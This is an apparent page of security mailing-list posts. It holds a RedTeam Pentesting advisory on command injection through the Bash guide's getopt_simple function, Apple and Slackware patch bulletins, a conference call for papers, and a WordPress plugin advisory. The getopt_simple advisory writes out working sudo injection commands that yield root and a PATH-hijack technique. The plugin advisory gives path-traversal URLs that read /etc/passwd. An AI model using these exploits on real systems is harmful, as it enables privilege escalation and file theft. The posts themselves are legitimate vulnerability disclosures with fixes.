[RT-SA-2019-007] Code Execution via Insecure Shell Function getopt_simple
Advisory: Code Execution via Insecure Shell Function getopt_simple
RedTeam Pentesting discovered that the shell function "getopt_simple",
as presented in the "Advanced Bash-Scripting Guide", allows execution of
attacker-controlled commands.
Details
===
Product: Advanced Bash-Scripting Guide
Affected Versions: all
Fixed Versions: -
Vulnerability Type: Code Execution
Security Risk: medium
Vendor URL: https://www.tldp.org/LDP/abs/html/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-007
Advisory Status: private
CVE: CVE-2019-9891
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9891
Introduction
The document "Advanced Bash-Scripting Guide" [1] is a tutorial for
writing shell scripts for Bash. It contains many example scripts
together with in-depth explanations about how shell scripting works.
More Details
During a penetration test, RedTeam Pentesting was able to execute
commands as an unprivileged user (www-data) on a server. Among others,
it was discovered that this user was permitted to run the shell script
"cleanup.sh" as root via "sudo":
$ sudo -l
Matching Defaults entries for user on srv:
env_reset, secure_path=/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on srv:
(root) NOPASSWD: /usr/local/sbin/cleanup.sh
The script "cleanup.sh" starts with the following code:
#!/bin/bash
getopt_simple()
{
until [ -z "$1" ]
do
if [ ${1:0:2} = '--' ]
then
tmp=${1:2} # Strip off leading '--' . . .
parameter=${tmp%%=*} # Extract name.
value=${tmp##*=} # Extract value.
eval $parameter=$value
fi
shift
done
}
target=/tmp
# Pass all options to getopt_simple().
getopt_simple $*
# list files to clean
echo "listing files in $target"
find "$target" -mtime 1
The function "getopt_simple" is used to set variables based on
command-line flags which are passed to the script. Calling the script
with the argument "--target=/tmp" sets the variable "$target" to the
value "/tmp". The variable's value is then used in a call to "find". The
source code of the "getopt_simple" function has been taken from the
"Advanced Bash-Scripting Guide" [2]. It was also published as a book.
RedTeam Pentesting identified two different ways to exploit this
function in order to run attacker-controlled commands as root.
First, a flag can be specified in which either the name or the value
contain a shell command. The call to "eval" will simply execute this
command.
$ sudo /usr/local/sbin/cleanup.sh '--redteam=foo;id'
uid=0(root) gid=0(root) groups=0(root)
listing files in /tmp
$ sudo /usr/local/sbin/cleanup.sh '--target=$(id)'
listing files in uid=0(root) gid=0(root) groups=0(root)
find: 'uid=0(root) gid=0(root) groups=0(root)': No such file or directory
$ sudo /usr/local/sbin/cleanup.sh '--target=$(ls${IFS}/)'
listing files in bin
boot
dev
etc
[...]
Instead of injecting shell commands, the script can also be exploited by
overwriting the "$PATH" variable:
$ mkdir /tmp/redteam
$ cat < /tmp/redteam/find
#!/bin/sh
echo "executed as root:"
/usr/bin/id
EOF
$ chmod +x /tmp/redteam/find
$ sudo /usr/local/sbin/cleanup.sh --PATH=/tmp/redteam
listing files in /tmp
executed as root:
uid=0(root) gid=0(root) groups=0(root)
Workaround
==
No workaround available.
Fix
===
Replace the function "getopt_simple" with the built-in function
"getopts" or the program "getopt" from the util-linux package.
Examples on how to do so are included in the same tutorial [3][4].
Security Risk
=
If a script with attacker-controlled arguments uses the "getopt_simple"
function, arbitrary commands may be invoked by the attackers. This is
particularly interesting if a privilege boundary is crossed, for example
in the context of "sudo". Overall, this vulnerability is rated as a
medium risk.
Timeline
2019-02-18 Vulnerability identified
2019-03-20 Customer approved disclosure to vendor
2019-03-20 Author notified
2019-03-20 Author responded, document is not updated/maintained any more
2019-03-20 CVE ID requested
2019-03-21 CVE ID assigned
2019-03-26 Advisory released
References
==
[1] https://www.tldp.org/LDP/abs/html/
[2] https://www.tldp.org/LDP/abs/html/string-manipulation.html#GETOPTSIMPLE
[3]
Recon 2019 Call For Papers - June 28 - 30, 2019 - Montreal, Canada
Recon Montreal - Call For Papers - June 28 - 30 - 2019 Welcome to TeleMate! ATDT1514XXX CONNECT 300 .. DATAPAC : DATAPAC: Call connected to This is a private system. Access attempts are logged. Unauthorized access may result in prosecution. Bienvenue! ++ + + + + + + + \ / + _- _+_ - ,__ _=..:. /=\ _|===|_ ||::| | |_|.| | | | | | __===_ -=- ||::| |==| | | __|.:.| /\| |:. | || | .|| : |||::| | |- |.:|_|. :__ |.: |--|==| | .| |_ | ' |. ||. |||:.| __|. | |_|. | |.|...||---| |==| | | | |_--. || |||. | | | | |. | | |::.||: .| |==| | . : |=|===|:|| . ||| .| |:.| .| | | | |:.:|| . | |==| | |=|===| . |' | | | | | | | |' : . | ; ;'| ' : ` : '. ' . . : ' . R E C O N 2 0 1 9 . `.. ' . C F P . june 28 to 30, 2019 montreal, quebec . + Hi - Flash back from 2008 .. + We are back ╔═╩╗ # C F P # ╚══╗ We are now inviting speakers to submit proposals ║ for Recon Montreal 2019. ║ ║ Some guidelines for talks are: ║ ║ - 30 or 60 minute presentations ║ ║ - We are open to proposals for workshops that would occur alongside ║ talks ║ ║ - There will be time for five to ten minute informal lightning talks ║ during the REcon party ║ ║ ║ ║ ╔══╝ ╚══╗ ║ _ _ _ ║ | _ \ ___ __ _(_)___| |_ _ __ __ _| |_(_) ___ _ __ ║ | |_) / _ \/ _` | / __| __| '__/ _` | __| |/ _ \| '_ \ ║ | _ < __/ (_| | \__ \ |_| | | (_| | |_| | (_) | | | | █╗ ║ |_| \_\___|\__, |_|___/\__|_| \__,_|\__|_|\___/|_| |_| ║ ║ |___/ ║ ║ ║ ║ Registration for the conference and training sessions is now open. ║ ║ - - - - - - - - ║ ║ You can register at: https://tickets.recon.cx/reconmtl/2019/ ║ ║ ║ ║ ║ ║ ║ ║ ║ ║ _ _ █╩═╣ |_ _| __ __ _(_)_ __ (_)_ __ __ _ ║ | || '__/ _` | | '_ \| | '_ \ / _` | ║ | || | | (_| | | | | | | | | | (_| | ║ |_||_| \__,_|_|_| |_|_|_| |_|\__, | █═══╗ ║ |___/║ ║ ║ ║ ║ ║ This year we have another great set of trainings available: ║ ║ ║ ║
[slackware-security] mozilla-thunderbird (SSA:2019-084-01)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] mozilla-thunderbird (SSA:2019-084-01) New mozilla-thunderbird packages are available for Slackware 14.2 and -current to fix security issues. Here are the details from the Slackware 14.2 ChangeLog: +--+ patches/packages/mozilla-thunderbird-60.6.1-i686-1_slack14.2.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/60.6.1/releasenotes/ https://www.mozilla.org/security/known-vulnerabilities/thunderbird.html (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/mozilla-thunderbird-60.6.1-i686-1_slack14.2.txz Updated package for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/mozilla-thunderbird-60.6.1-x86_64-1_slack14.2.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-60.6.1-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-60.6.1-x86_64-1.txz MD5 signatures: +-+ Slackware 14.2 package: 8819ba1c1bb0b82acedde947fe831567 mozilla-thunderbird-60.6.1-i686-1_slack14.2.txz Slackware x86_64 14.2 package: b34e9acd3100d592e825c1c912b2 mozilla-thunderbird-60.6.1-x86_64-1_slack14.2.txz Slackware -current package: 6280813fd16a6563e12330ffd92ee5ff xap/mozilla-thunderbird-60.6.1-i686-1.txz Slackware x86_64 -current package: 97a9367a19d5eab63ba37e75302a9d78 xap/mozilla-thunderbird-60.6.1-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg mozilla-thunderbird-60.6.1-i686-1_slack14.2.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- iEYEARECAAYFAlyZWC0ACgkQakRjwEAQIjOQ+QCffkLund3ww9QStLuS1m0dmVb+ R80AniT1IrbUMXizVvdblllMK35L3Bep =4Hxr -END PGP SIGNATURE-
APPLE-SA-2019-3-25-1 iOS 12.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-1 iOS 12.2 iOS 12.2 is now available and addresses the following: CFString Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted string may lead to a denial of service Description: A validation issue was addressed with improved logic. CVE-2019-8516: SWIPS Team of Frifee Inc. configd Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A memory initialization issue was addressed with improved memory handling. CVE-2019-8552: Mohamed Ghannam (@_simo36) Contacts Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A buffer overflow issue was addressed with improved memory handling. CVE-2019-8511: an anonymous researcher CoreCrypto Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher Exchange ActiveSync Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A user may authorize an enterprise administrator to remotely wipe their device without appropriate disclosure Description: This issue was addressed with improved transparency. CVE-2019-8512: an anonymous researcher, an anonymous researcher FaceTime Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A user's video may not be paused in a FaceTime call if they exit the FaceTime app while the call is ringing Description: An issue existed in the pausing of FaceTime video. The issue was resolved with improved logic. CVE-2019-8550: Lauren Guzniczak of Keystone Academy Feedback Assistant Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to gain root privileges Description: A race condition was addressed with additional validation. CVE-2019-8565: CodeColorist of Ant-Financial LightYear Labs Feedback Assistant Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to overwrite arbitrary files Description: This issue was addressed with improved checks. CVE-2019-8521: CodeColorist of Ant-Financial LightYear Labs file Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted file might disclose user information Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2019-6237: an anonymous researcher GeoServices Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Clicking a malicious SMS link may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2019-8553: an anonymous researcher iAP Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher IOHIDFamily Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: A memory corruption issue was addressed with improved state management. CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team IOKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to read kernel memory Description: A memory initialization issue was addressed with improved memory handling. CVE-2019-8504: an anonymous researcher IOKit SCSI Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2019-8529: Juwei Lin (@panicaII) of Trend Micro Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory Description: A buffer overflow was addressed with improved size validation. CVE-2019-8527: Ned Williamson of Google and derrek (@derrekr6) Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A logic issue was addressed with improved state management. CVE-2019-8514: Samuel Groß of Google
APPLE-SA-2019-3-25-6 iCloud for Windows 7.11
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-6 iCloud for Windows 7.11 iCloud for Windows 7.11 is now available and addresses the following: CoreCrypto Available for: Windows 7 and later Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher iTunes Available for: Windows 7 and later Impact: Running the iTunes installer in an untrusted directory may result in arbitrary code execution Description: A race condition existed during the installation of iTunes for Windows. This was addressed with improved state handling. CVE-2019-6232: Stefan Kanthak (eskamation.de) WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. CVE-2019-8506: Samuel Groß of Google Project Zero WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8535: Zhiyang Zeng (@Wester) of Tencent Blade Team WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-6201: dwfault working with ADLab of Venustech CVE-2019-8518: Samuel Groß of Google Project Zero CVE-2019-8523: Apple CVE-2019-8524: G. Geshev working with Trend Micro Zero Day Initiative CVE-2019-8558: Samuel Groß of Google Project Zero CVE-2019-8559: Apple CVE-2019-8563: Apple WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A cross-origin issue existed with the fetch API. This was addressed with improved input validation. CVE-2019-8515: James Lee (@Windowsrcer) WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8536: Apple CVE-2019-8544: an anonymous researcher WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2019-7285: dwfault working at ADLab of Venustech CVE-2019-8556: Apple WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: A validation issue was addressed with improved logic. CVE-2019-7292: Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team WebKit Available for: Windows 7 and later Impact: A malicious website may be able to execute scripts in the context of another website Description: A logic issue was addressed with improved validation. CVE-2019-8503: Linus Särud of Detectify WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to universal cross site scripting Description: A logic issue was addressed with improved validation. CVE-2019-8551: Ryan Pickren (ryanpickren.com) Windows Installer Available for: Windows 7 and later Impact: Running the iCloud installer in an untrusted directory may result in arbitrary code execution Description: A race condition existed during the installation of iCloud for Windows. This was addressed with improved state handling. CVE-2019-6236: Stefan Kanthak (eskamation.de) Additional recognition Safari We would like to acknowledge Nikhil Mittal (@c0d3G33k) of Payatu Labs (payatu.com) for their assistance. WebKit We would like to acknowledge Andrey Kovalev of Yandex Security Team for their assistance. Installation note: iCloud for Windows 7.11 may be obtained from: https://support.apple.com/HT204283 Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlyZM7spHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3FvIRAA msR75UH21iTYcw51dCCfBKSvthsplmLy/4hXwdD975Qk23H6nPRH+0CDQf1E+y3C KmWHZafHoUjfyu28MH5bJcYV9LZ2cTNZ+88f7EKNAH7Ox5MfzEyCO5EtA7Q9F/1W HbMBS7HmWPTFPREI5HzNrilhvV6GvOkql/7Wsp9a6miOJ4QO7oHcLc1YZB9Vh25B xiQJZeJ443DKfJKeWVOL3qVyL3xqGUB0rN3LFIWrFpybfuMyuNwle6lwQvcy0ulK FBCmj1MNlsep0dQHdA/jaR3UYWcNBOTieAh7QTsdOsa+64cTrJtQOqhAtI7ffu3k c+v84wO9URzosbXZEmQgw9lKDd8k+o2qy13QNULsIf0KKeNdhKwNq1EzvvDF0z/a OMot5r1l1ufhKd9SHPJZ1ouXz5d5zx3hjGMMhCxINVKfa26ZEqlRW5ST/vtxwL0v Q8SsfefyowWTimnt+Wl52ErwNgyS/ejTgGRzmrR1zlIVBk2eczwTlMd4bmHYMTHu
[article2pdf (Wordpress plug-in)] Multiple vulnerabilities (CVE-2019-1000031, CVE-2019-1010257)
Product: article2pdf (Wordpress plug-in) Product Website: https://wordpress.org/plugins/article2pdf/ Affected Versions: 0.24 and greater The following vulnerabilities were found in a code review of the plug-in. An attempt to contact the plug-in maintainer on 8 December 2018 was unsuccessful. The Wordpress security team disabled downloads of the plug-in upon notification on 8 January 2019. I would like to thank Ken Johnson (@cktricky) and Set Law (@sethlaw) whose course "Seth & Ken's Excellent Adventures in Secure Code Review" sparked my interest in reviewing code for vulnerabilities. [CVE-2019-131] Generated PDF file is only removed after download which is initiated by a redirect = Type: - Resource Exhaustion Description: --- The plugin generates a PDF version of a post/article when a link of the form https://www.example.com/.../my-post-title/?article2pdf=1 is visited. The response to this initial request is a redirect to a link like http://www.example.com/wp-content/plugins/article2pdf/article2pdf_getfile.php?p=xxx=yyy=zzz which will then return the PDF file contents and subsequently delete the file. As the deletion is coupled with the download but the download is initiated by a different request than the one which creates the file, visiting the link which creates the file and not following the redirect results in the file not being deleted. These files can then accumulate and potentially exhaust the available disk space. Depending on the server setup, space exhaustion of a hard drive or hard drive partition or even just a disk quota can result in denial of service even for unrelated services on the same machine which rely on the same resource. This issue was originally reported on the plugin's bug tracker [2] but never identified as a vulnerability. Exploit --- Repeatedly visit a PDF generation link the plugin provides without ever following the redirect to exhaust disk space. [CVE-2019-1010257] PDF file download path is constructed from insufficiently sanitised user input = Type: - Information Disclosure / File Deletion Description: When visiting the PDF download link which the original PDF generation link redirects to, the file path is constructed from a combination of fixed strings and the strings provided via the query string of the download URL. The download URL has the form http://www.example.com/wp-content/plugins/article2pdf/article2pdf_getfile.php?p=xxx=yyy=zzz where xxx is a base64 encoded absolute string, xxx is a short hex hash and zzz is the base64 encoded URL title slug of the post the PDF was generated from. While the plugin attempts to sanitise these input parameters to not allow path traversal, this sanitisation is insufficient and can be fully or partially circumvented depending on the PHP version the Wordpress instance is running on. In the case of PHP version <5.3 it is possible to read any file the user the plugin is executed under has read access to by just encoding the full file path in the parameter "d" and terminating that string with a null-byte. The parameter "p" must not be empty but can contain any value. The parameter "r" may be empty but its value is of no significance. If the user that the script is executed as has write access to the file or the directory it is stored in, the file will be deleted after it has been downloaded. If the user has no write access, an error message may be shown at the end of the file contents offered which discloses the Wordpress instance's install directory on the server. In the case of PHP version >=5.3, null-termination will no longer cut off the string. As the generated file name ends with a fixed string ".pdf", only files with that file ending can be read. The parameter "d" may be any directory on the server. The parameter "p" needs to contain 8 backspace characters to delete a prepended fixed string from the file name while the parameter "r" must contain exactly one backspace. The actual file name (without the ".pdf") can then be appended to the backspaces in either parameter "p" or parameter "r". It is also possible to have "p" contain one random character and then have 10 backspace characters followed by the actual file name (again, without the ".pdf") stored in parameter "r". The information above can also be found on the plug-in's issue tracker [3]. Exploit: On PHP <5.3, a specially crafted link like http://php52.example.com/wp-content/plugins/article2pdf/article2pdf_getfile.php?p=YQL2V0Yy9wYXNzd2QA will download the server's /etc/passwd file. On PHP >=5.3, a specially crafted link like http://www.example.com/wp-content/plugins/article2pdf/article2pdf_getfile.php?p=CAgICAgICAg==%08test=L3RtcA== will return the contents of the file "/tmp/test.pdf" and
APPLE-SA-2019-3-25-3 tvOS 12.2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-3 tvOS 12.2 tvOS 12.2 is now available and addresses the following: CFString Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing a maliciously crafted string may lead to a denial of service Description: A validation issue was addressed with improved logic. CVE-2019-8516: SWIPS Team of Frifee Inc. configd Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to elevate privileges Description: A memory initialization issue was addressed with improved memory handling. CVE-2019-8552: Mohamed Ghannam (@_simo36) CoreCrypto Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher file Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing a maliciously crafted file might disclose user information Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2019-6237: an anonymous researcher Foundation Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to gain elevated privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2019-7286: an anonymous researcher, Clement Lecigne of Google Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel Groß of Google Project Zero GeoServices Available for: Apple TV 4K and Apple TV (4th generation) Impact: Clicking a malicious SMS link may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved validation. CVE-2019-8553: an anonymous researcher iAP Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher IOHIDFamily Available for: Apple TV 4K and Apple TV (4th generation) Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: A memory corruption issue was addressed with improved state management. CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory Description: A buffer overflow was addressed with improved size validation. CVE-2019-8527: Ned Williamson of Google and derrek (@derrekr6) Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to determine kernel memory layout Description: A memory initialization issue was addressed with improved memory handling. CVE-2019-8540: Weibo Wang (@ma1fan) of Qihoo 360 Nirvan Team Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: An application may be able to gain elevated privileges Description: A logic issue was addressed with improved state management. CVE-2019-8514: Samuel Groß of Google Project Zero Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: A local user may be able to read kernel memory Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-7293: Ned Williamson of Google Kernel Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation. CVE-2019-6207: Weibo Wang of Qihoo 360 Nirvan Team (@ma1fan) CVE-2019-8510: Stefan Esser of Antid0te UG Power Management Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple input validation issues existed in MIG generated code. These issues were addressed with improved validation. CVE-2019-8549: Mohamed Ghannam (@_simo36) of SSD Secure Disclosure (ssd-disclosure.com) Siri Available for: Apple TV 4K and Apple TV (4th generation) Impact: A malicious application may be able to initiate a Dictation request without user authorization Description: An API issue existed in the handling of dictation requests. This issue was addressed with improved validation. CVE-2019-8502: Luke Deshotels of North Carolina State University, Jordan Beichler of North Carolina State University, William Enck of North Carolina State University, Costin Carabaș of University POLITEHNICA of Bucharest, and Răzvan Deaconescu of University POLITEHNICA of Bucharest TrueTypeScaler Available for: Apple TV 4K and Apple TV (4th generation) Impact: Processing a maliciously crafted font may result in the disclosure of process memory Description: An
APPLE-SA-2019-3-25-5 iTunes 12.9.4 for Windows
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-5 iTunes 12.9.4 for Windows iTunes 12.9.4 for Windows is now available and addresses the following: CoreCrypto Available for: Windows 7 and later Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved bounds checking. CVE-2019-8542: an anonymous researcher WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. CVE-2019-8506: Samuel Groß of Google Project Zero WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8535: Zhiyang Zeng (@Wester) of Tencent Blade Team WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-6201: dwfault working with ADLab of Venustech CVE-2019-8518: Samuel Groß of Google Project Zero CVE-2019-8523: Apple CVE-2019-8524: G. Geshev working with Trend Micro Zero Day Initiative CVE-2019-8558: Samuel Groß of Google Project Zero CVE-2019-8559: Apple CVE-2019-8563: Apple WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A cross-origin issue existed with the fetch API. This was addressed with improved input validation. CVE-2019-8515: James Lee (@Windowsrcer) WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8536: Apple CVE-2019-8544: an anonymous researcher WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2019-7285: dwfault working at ADLab of Venustech CVE-2019-8556: Apple WebKit Available for: Windows 7 and later Impact: A malicious website may be able to execute scripts in the context of another website Description: A logic issue was addressed with improved validation. CVE-2019-8503: Linus Särud of Detectify WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: A validation issue was addressed with improved logic. CVE-2019-7292: Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team WebKit Available for: Windows 7 and later Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: A memory corruption issue was addressed with improved validation. CVE-2019-8562: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab WebKit Available for: Windows 7 and later Impact: Processing maliciously crafted web content may lead to universal cross site scripting Description: A logic issue was addressed with improved validation. CVE-2019-8551: Ryan Pickren (ryanpickren.com) Additional recognition Safari We would like to acknowledge Nikhil Mittal (@c0d3G33k) of Payatu Labs (payatu.com) for their assistance. WebKit We would like to acknowledge Andrey Kovalev of Yandex Security Team for their assistance. Installation note: iTunes 12.9.4 for Windows may be obtained from: https://www.apple.com/itunes/download/ Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlyZM7kpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3Ec0RAA nGDG01Ralu3vmvx1OPEfY1Ebf770lEYbG1Fb7ZE13iaSKFaPu4S3R2bpRAwjz4eV 3u2Q75tKuQhntOeuxwdhXC95/Udeh45m+BN03yqDlK3qBohTqCl1VGAch5aLc52V g+BOIGP/+NW3MqveRE9WoDF8TO021cjKmrtRqlF022dSZihRS6mXHHB5x2Uj9Jaq hIFdFXu/EO0O3VHaoHSCmfpiA5SJqSoNZJJDdwjh9acj2/cIFcdbhhR6IE3MufAh 7O6IDWt8h95wqhJubK8dKkIDpKBSILqNxrslpoCt8OntCk5P64RlGUDcAXGLm8Tt 1imDpIK6Dr4VFQ0nYHx1xhq0gGMPEzUSW/W8j9tMO3TISlY+1632Sp7fP9tFMfyp tTmv+kucifAA7yGMxZXh7d9WnkvzY6AkHJ/VwiGexemUDxBGsYSAtbZPmwbfkypl IQ0Eg8hV6VqG7qNIq6ePuruBxtwjjZcx8p8uOUQj8uSsG8aSYxHUOoWa4idY7APg absij97ZRrXC6OSjmoyNUAwgmmwhOm2hNXErnK0YURFeamPcyvqzTamAy6GmCvhz WZGax0M0v7KOpPEEbJUVjJ7rN8g1v7gaY0LTqobjMWRk6+pXeSJ9loO0p682Gkt3 pvl90xARoY+d9ywFQ6Z3XawFQ8PJokCkPrzvjj+SlZk= =NF9p -END PGP SIGNATURE-
APPLE-SA-2019-3-25-4 Safari 12.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2019-3-25-4 Safari 12.1 Safari 12.1 is now available and addresses the following: Safari Reader Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting Description: A logic issue was addressed with improved validation. CVE-2019-6204: Ryan Pickren (ryanpickren.com) CVE-2019-8505: Ryan Pickren (ryanpickren.com) WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A type confusion issue was addressed with improved memory handling. CVE-2019-8506: Samuel Groß of Google Project Zero WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2019-8535: Zhiyang Zeng (@Wester) of Tencent Blade Team WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-6201: dwfault working with ADLab of Venustech CVE-2019-8518: Samuel Groß of Google Project Zero CVE-2019-8523: Apple CVE-2019-8524: G. Geshev working with Trend Micro Zero Day Initiative CVE-2019-8558: Samuel Groß of Google Project Zero CVE-2019-8559: Apple CVE-2019-8563: Apple WebKit Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and Mojave 10.14.4 Impact: Processing maliciously crafted web content may disclose sensitive user information Description: A cross-origin issue 